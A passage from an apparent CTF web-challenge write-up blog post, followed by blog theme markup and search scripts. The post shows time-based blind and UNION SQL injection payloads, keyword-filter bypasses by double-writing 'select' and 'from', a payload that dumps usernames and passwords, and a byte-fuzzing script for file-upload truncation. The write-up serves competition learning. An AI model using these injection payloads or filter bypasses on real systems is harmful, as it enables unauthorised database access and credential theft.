<p>mid 也没被过滤<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;+and+if(mid((SELECT+VERSION()),1,1)+&gt;1,sleep(3),0)%23</span><br></pre></td></tr></table></figure></p>
<p>测下面这条语句被拦了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;+and+if(mid((SELECT+schema_name+from+information_schema.SCHEMATA+limit+1,1),1,1)+&gt;1,sleep(3),0)%23</span><br></pre></td></tr></table></figure></p>
<p>下面这个证明拦截了关键字<code>information_schema.</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;+and+if(mid((SELECT+schema_name+from+SCHEMATA+limit+1,1),1,1)+&lt;1,sleep(3),0)%23&amp;Submit=Select+Guest</span><br></pre></td></tr></table></figure></p>
<p>可以用<code>information . tables</code>绕过，然后提示str_replace为空，所以需要双写，这里需要fuzz一下过滤的东西。然后双写select和from即可绕过<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;+and+if+((ascii(mid((seselectlect+table_name+frofromm+information_schema+.+tables+limit+1),1,1))&gt;1),sleep(3),0)%23</span><br></pre></td></tr></table></figure></p>
<p>这里还有一个显注的方法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=sd&apos; unifromon selselectect (seselectlect group_concat(username,&apos;:&apos;,password)frfromom web.user),2#:</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p><a href="https://xz.aliyun.com/t/3153#toc-3" target="_blank" rel="noopener">https://xz.aliyun.com/t/3153#toc-3</a></p>
</blockquote>
<p>接下来就是一个<strong>文件上传</strong><br><img src="http://static.zybuluo.com/Passer6y/dnew3s0p4brzpxp5346d1euf/image_1crhijg1o78isca1kto1blqahb9.png" alt="image_1crhijg1o78isca1kto1blqahb9.png-96.1kB"><br>这里得想办法截断txt,或许是nginx解析漏洞？</p>
<p>sn00py师傅教我fuzz，0x00-&gt;0xff 然后尝试截断后面的txt，先用脚本生成一下字典<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">for i in range(0,256):</span><br><span class="line">    i = bytes(chr(i), &apos;utf8&apos;)</span><br><span class="line">    with open(&quot;dic.txt&quot;, &quot;ab+&quot;) as f:</span><br><span class="line">        f.write(i)</span><br><span class="line">        f.write(bytes(&apos;\n&apos;, &apos;utf-8&apos;))</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/02r8d73xr5serxwfjhnu3mi6/image_1crhk7625t337hc7nd813qcb26.png" alt="image_1crhk7625t337hc7nd813qcb26.png-113.7kB"></p>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://0day.design/2018/11/07/骇极杯Web Writeup/" title="骇极杯Web Writeup">http://0day.design/2018/11/07/骇极杯Web Writeup/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/16/跨站数据劫持/" rel="next" title="跨站数据劫持">
                <i class="fa fa-chevron-left"></i> 跨站数据劫持
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/01/安洵杯2018-WebN出题记录/" rel="prev" title="安洵杯2018-WebN出题记录">
                安洵杯2018-WebN出题记录 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">30</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ph0rse.me/" title="Ph0rse" target="_blank">Ph0rse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.hpdoger.cn/" title="Hpdoger" target="_blank">Hpdoger</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://adm1n.design/" title="Hu3sky" target="_blank">Hu3sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.0akarma.com/" title="0akarma" target="_blank">0akarma</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/H4lo" title="H4lo" target="_blank">H4lo</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/P1g3/" title="P1g3" target="_blank">P1g3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://patrilic.top/" title="Patrilic" target="_blank">Patrilic</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>









<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共58.7k字</span>
</div>

<span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
